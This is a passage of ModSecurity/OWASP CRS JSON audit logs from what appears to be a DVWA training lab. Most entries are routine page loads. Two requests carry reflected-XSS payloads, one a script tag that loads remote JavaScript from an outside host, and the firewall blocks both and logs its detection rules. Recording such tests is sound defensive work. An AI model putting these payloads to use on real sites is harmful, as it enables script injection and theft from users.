Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcznH8AAQEAAAkYuE0AAAAD\"]"],"stopwatch":{"p1":348,"p2":1326,"p3":73,"p4":405,"p5":72,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:40 --0400","transaction_id":"WRczwH8AAQEAAAkZ0BEAAAAE","remote_address":"192.168.75.145","remote_port":56768,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_d/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1603","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_d/\"] [unique_id \"WRczwH8AAQEAAAkZ0BEAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":514,"p2":2666,"p3":111,"p4":777,"p5":97,"sr":108,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:40 --0400","transaction_id":"WRczwH8AAQEAAAkVV4kAAAAA","remote_address":"192.168.75.145","remote_port":56770,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_d/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1603","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_d/\"] [unique_id \"WRczwH8AAQEAAAkVV4kAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":653,"p2":2435,"p3":104,"p4":520,"p5":85,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:50 --0400","transaction_id":"WRczyn8AAQEAAAmHBJQAAAAF","remote_address":"192.168.75.145","remote_port":56772,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_d/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRczyn8AAQEAAAmHBJQAAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":722,"p2":2335,"p3":181,"p4":457,"p5":81,"sr":170,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:50 --0400","transaction_id":"WRczyn8AAQEAAAmHBJUAAAAF","remote_address":"192.168.75.145","remote_port":56772,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_d/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRczyn8AAQEAAAmHBJUAAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":505,"p2":2245,"p3":125,"p4":389,"p5":77,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:27:10 --0400","transaction_id":"WRcz3n8AAQEAAAkW4RsAAAAB","remote_address":"192.168.75.145","remote_port":56774,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: '';!--\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: '';!--\\\\\\\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":693,"p2":3265,"p3":0,"p4":0,"p5":220,"sr":31,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:28:26 --0400","transaction_id":"WRc0Kn8AAQEAAAkXs@cAAAAC","remote_address":"192.168.75.145","remote_port":56776,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fxss.rocks%2Fxss.js%3E%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT SRC=http://xss.rocks/xss.js> found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <SCRIPT found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 23)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 23 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver 